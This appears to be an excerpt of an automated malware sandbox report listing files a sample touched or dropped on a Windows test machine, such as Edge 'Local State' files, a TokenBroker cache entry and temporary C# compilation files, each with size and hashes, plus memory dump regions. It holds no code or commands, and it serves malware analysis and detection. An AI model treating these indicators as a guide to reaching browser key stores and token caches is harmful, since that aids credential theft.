                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                              537262650d4221699a6180d3ce84fdb3

                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                              5cafcd2d37a20431bd9d986d35b9038e76d26188

                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                              aa0b30c4cfacb932a93fff721cd57a57647016b2564af660eca00f2b8c90efb2

                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                              9dbe72d03c0d36d9e82b256afaa4cd454d9f97547c90f1f3313c624bbfb30fdf195bc7b90122470f4eab6e62434ffa78569118d2200cb81f0d77c0c0271b0a91

                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              39KB

                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                              d96dd443513e4309f4f3944b61a8d1c1

                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                              dbefb726f1a23b2793ddceb8b28daa469b85a45f

                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                              e54750ee8dcad9bfd302c17aac33de2b7f739465a93173eb05b18723e00a15cb

                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                              b1e72d4eb8a521c342cd3bc7dd9df665146b1fc927fa2a76a84817efcc7df756c01e13278327b80587a24e9a5c4351055de67597f28c122da21f62c01d1acc86

                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              48KB

                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                              c416f81c37e0f72d4746edf9a89bbc54

                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                              8ec3b2170d409e02239b75a5c5405f66b98dca13

                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                              0d6758e7fb9e6c1326868a83af435ac7575ae538cf6c41544f595290a9ca2c37

                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                              a525cdca6ea1e64f5c1d229cbe01653068e21c416592ce29641c86ac090388e905c0169ffb15c55e8781d49d765175a64637957b69757824ca3826a806c1b38e

                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              60KB

                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                              fe437529e0ecb65f8ea2cc50daea3899

                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                              2faeeef44602621742c2fb9a90bc1517c1e0c29b

                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                              b05940392ccaa815aac800b3aa86a381c617054e3c4bfe121a437bab36dd6789

                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                              b3b85b83e73227162f6f5324f0b4aa9ac45919dbb81367e3545ab60a770f9a15984de3a9da279d5c873788e5db4e9ae3e15cea981ab0cef18742d0a74c0f7080

                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              53KB

                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                              90a5606583dbb1614bf2b8c9918acfa6

                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                              ecb19923d93c48dbd53eeb222f373802c8a13970

                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                              2664189f9ea49ef5dc74af1c36f02a882d371aca227ecff651a43ecccc943f5d

                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                              d96814eccabaaf7177e31a34e2999a319da291c7c1ee4f88321947d5a083e35056f3cd7246afdad59e4f34be36262a0a4d75f114b1fd6e9ae1ea561cbfb37a4b

                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ShaderCache\data_1

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              264KB

                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                              3d446ab117aad530e6c654ca79e2b4c9

                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                              41783e7a60b076d961d56ce92586bdb393dcacd5

                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                              af6bd4eed84a3e7c68d45b48c3c69b7db4caa27529bd7649b5e3b94630b3976d

                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                              4a3eedf24363f02efd4447981fc6c8ddebaf8bc578e89a9e3d49c0492532257469bbc4766d9b8728dfa27afc230a367251c870d05e95a3d36e189dd154cbc526

                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Variations

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              86B

                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                              961e3604f228b0d10541ebf921500c86

                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                              6e00570d9f78d9cfebe67d4da5efe546543949a7

                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                              f7b24f2eb3d5eb0550527490395d2f61c3d2fe74bb9cb345197dad81b58b5fed

                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                              535f930afd2ef50282715c7e48859cc2d7b354ff4e6c156b94d5a2815f589b33189ffedfcaf4456525283e993087f9f560d84cfcf497d189ab8101510a09c472

                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\extensions_crx_cache\ghbmnnjooekpmoecnnnilnnbdlolhkhi_1.dff2c9d9755f96713c08f4932a9091080808ec34c0823feac2206fa526f91e60

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              153KB

                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                              b0917d8e6c5b6be358bff67f84eb8336

                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                              a6e221edcb19a1cc81575b4ddd927fd9a6fbdd6d

                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                              dff2c9d9755f96713c08f4932a9091080808ec34c0823feac2206fa526f91e60

                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                              cd5822bbf91e8f7f5ab2b471a4bf8b464bde95465e2fccc6a57e5a287ca55d5062bdd6d4b3cd76f8529ee7a9081b6a7aad7dc2a7581c344ce4fd2d3256bdf451

                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              2KB

                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                              b743dd6e1e37d10331d4de4da799a788

                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                              c9f108a917b1dfc6a55079b09fc3fe541f94a000

                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                              2df81482ae971725928b1c252020dda4df151cc0d17d1fb00180c8df7a3d8e61

                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                              66b4372bd6b1d3256e9a8e57274493df6a8b4d54c2ffb0f893b15fa875f2f3c30921e13298d5bb1edc834e9c5d2e0d0062c3ab70e7b2452fa1e80efc752e92bd

                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              1KB

                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                              181bdc50407bf93657f4a846cc6cd613

                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                              36078691dedef93c030b0b2d1b66ffbae34a536a

                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                              e925db843a8bd0fa1b05c769f3cb24089f6fe9997a5411ac2e6a8ae15af5ee63

                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                              94c0e4298636e1e21f6f69bb320dbe5ea4f34bded1988f7292502b9aba926fed5fe34258b4296ca13b092795feee5b95369f354033d3931d34930cb048e06849

                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              1KB

                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                              04d926e920daa8edf6cd17ea77dce267

                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                              f944b3805e290fc6eafee7658fedab9b90d8fdbd

                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                              e5b5aba68bdaf1614dfb3fd48b99452a0c7f096f05542d5b1f71e7fd73235379

                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                              4d3a35178273656335f2072aa92a09bd8eef3d8f366fd4a36e81d638a4fd4be2a296f0b388ce8eb64f50604e018a7ba434afb0e71ba0da82e325e235ca225c9d

                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              1KB

                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                              e26e403816be0b5fca11ea013456c7a8

                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                              2d6708815cc44fb5381e22253714e447c6fe683f

                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                              7cdfc0addfbe865ac74595ecb178fae604e83fcfbdc91b09646aadbb9b31d89b

                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                              08928269fd35753be0e20f534f9af27441a5e7a901248c77c4627c3b6fc626cd9d4f4fc60e009d4a843987e69376953073834e9f36ced3415b0f44ff16bde7f5

                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tweysowi.kja.ps1

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              60B

                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                              d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                              6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                                                                                                                                                                                            • \??\c:\Users\Admin\AppData\Local\Temp\zceahbm0\zceahbm0.0.cs

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              190B

                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                              4f82245a7a697114c52993b33e0d7e17

                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                              35777a662a7bc4d11ec707ea8f4c9e4ea76d6f8c

                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                              14f48c464ca2f67403f96d9e1a802f3fef062e68aea24c36abf51bf0e038010f

                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                              59021c09bfb8405d5a8448c4d9adbac9b98af8b088cbad6cef2ae9018823e52fd4690f63bce652409ef5b385d1a63a69c20629278e172c988910ac0f22cc6020

                                                                                                                                                                                                                                                                                            • \??\c:\Users\Admin\AppData\Local\Temp\zceahbm0\zceahbm0.cmdline

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              369B

                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                              019c97092f2887dd7be96fd93f88159b

                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                              5db99c00e4657cf2648c09fa16f70a2fbada2337

                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                              d7671dacd6c78a9b00a7ee88261d576cbfc5edb79dbd0d5365996c69f919c4b2

                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                              90978f369f3d7c6ddfa5547be96a8c400bd9eaa42fdc8f01ef5bf12629110e88b97585f3a9a395b9283b7d8708c4cbba0151b84f92d98aaff9cc10142df2e6d0

                                                                                                                                                                                                                                                                                            • memory/908-1048-0x000001B5221A0000-0x000001B522316000-memory.dmp

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              1.5MB

                                                                                                                                                                                                                                                                                            • memory/908-1049-0x000001B522530000-0x000001B52273A000-memory.dmp

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              2.0MB

                                                                                                                                                                                                                                                                                            • memory/4276-968-0x00000252537D0000-0x00000252537F2000-memory.dmp

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              136KB